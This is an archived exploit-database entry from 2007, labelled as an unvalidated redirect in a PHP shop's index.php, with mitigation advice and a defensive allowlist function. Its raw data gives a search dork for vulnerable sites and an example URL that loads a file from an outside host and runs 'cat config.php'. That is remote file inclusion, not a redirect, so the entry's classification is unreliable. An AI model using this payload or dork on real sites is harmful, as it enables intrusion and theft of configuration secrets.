Vendor: Not mentioned
By: mozi2weed@yahoo.com
CVSS: 5.5 (MEDIUM)
Title: Unvalidated Redirect and Forward
CWE: 601
Product Name: Not mentioned
Affected Version From: Not mentioned
Affected Version To: Not mentioned
Patch Exists: Not mentioned
Related CWE: Not provided
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
Year: 2007

Unvalidated Redirect and Forward

The vulnerability allows an attacker to redirect users to malicious websites or forward them to another page without proper validation.

Mitigation:

Developers should always validate and sanitize user input before using it in redirect or forward actions. Use whitelisting to allow only trusted URLs.
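
One way to apply the allowlist advice above to a redirect target read from the action parameter. This is an added example, not code from the original entry or from any affected product; the trusted host names, the default path and the function name safe_redirect_target are assumptions.

```php
<?php
// Added example: allowlist validation of a redirect target taken from the
// "action" query parameter. Host names and paths are constructed placeholders.

const TRUSTED_HOSTS  = ['shop.example.com', 'pay.example.com']; // assumption
const DEFAULT_TARGET = '/shop/index.php';                        // assumption

function safe_redirect_target(?string $raw): string
{
    if ($raw === null || $raw === '') {
        return DEFAULT_TARGET;
    }
    // Reject control characters (header injection) and backslashes,
    // which some browsers normalise to forward slashes.
    if (preg_match('/[\x00-\x1F\x7F\\\\]/', $raw)) {
        return DEFAULT_TARGET;
    }
    // Scheme-relative URLs ("//host/path") leave the site: reject them.
    if (strncmp($raw, '//', 2) === 0) {
        return DEFAULT_TARGET;
    }
    $parts = parse_url($raw);
    if ($parts === false) {
        return DEFAULT_TARGET;
    }
    // No scheme and no host: accept only an absolute local path.
    if (!isset($parts['scheme']) && !isset($parts['host'])) {
        return ($raw[0] === '/') ? $raw : DEFAULT_TARGET;
    }
    // Absolute URL: require https, no userinfo, and an exact host match.
    $scheme = strtolower($parts['scheme'] ?? '');
    $host   = strtolower($parts['host'] ?? '');
    if ($scheme !== 'https' || isset($parts['user']) || isset($parts['pass'])) {
        return DEFAULT_TARGET;
    }
    return in_array($host, TRUSTED_HOSTS, true) ? $raw : DEFAULT_TARGET;
}

// Constructed sample values for the "action" parameter.
$samples = ['/shop/basket.php?sid=1', 'https://pay.example.com/checkout',
            'http://untrusted.example.net/o.gif', '//untrusted.example.net/'];
foreach ($samples as $action) {
    printf("%-40s -> %s\n", $action, safe_redirect_target($action));
}
```

Anything that fails the checks falls back to the fixed default rather than being repaired, so a value that cannot be parsed is never redirected to.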

Exploit-DB raw data:

dork:allinurl:index.php?action= basket sid
vuln:index.php?action=
examples:
http://www.xxx.com/shop/index.php?action=http://adek.org/o.gif?&cmd=cat%20config.php

author:mozi2weed@yahoo.com
site:http://mozi.rootmybox.org
support:http://darkc0de.com & whoami

# milw0rm.com [2007-10-28]